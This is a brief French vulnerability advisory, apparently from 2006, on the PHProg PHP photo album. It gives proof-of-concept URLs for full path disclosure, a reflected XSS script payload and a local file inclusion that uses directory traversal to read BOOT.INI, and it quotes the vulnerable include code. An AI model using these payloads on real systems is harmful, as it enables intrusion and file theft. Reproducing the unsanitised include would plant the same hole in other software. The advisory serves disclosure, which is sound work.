(11/09/06)<br><br>* Produit vulnérable : PHProg ( Album photo en PHP )<br><br>* Site officiel du produit : <a href="http://www.PHProg.com/">http://www.PHProg.com/</a><br><br>* Failles de sécurité décelées :<br><br>1] Full path disclosure :
<a href="http://localhost/PHProg/?id=1&album=cdg393">http://localhost/PHProg/?id=1&album=cdg393</a><br><br>2] Cross Site Scripting ( XSS ) : <a href="http://localhost/PHProg/?id=1&album=">http://localhost/PHProg/?id=1&album=
</a><script>alert('cdg393')</script><br><br>3] Local File Inclusion : <a href="http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00">http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
</a><br><br> Ligne 59 => $lang=$_GET['lang'];<br> Ligne 61 => include("lang/$lang.php");<br> <br>* Credits : cdg393 :
<a href="http://cdg.new.fr">cdg.new.fr</a> =) <br><br>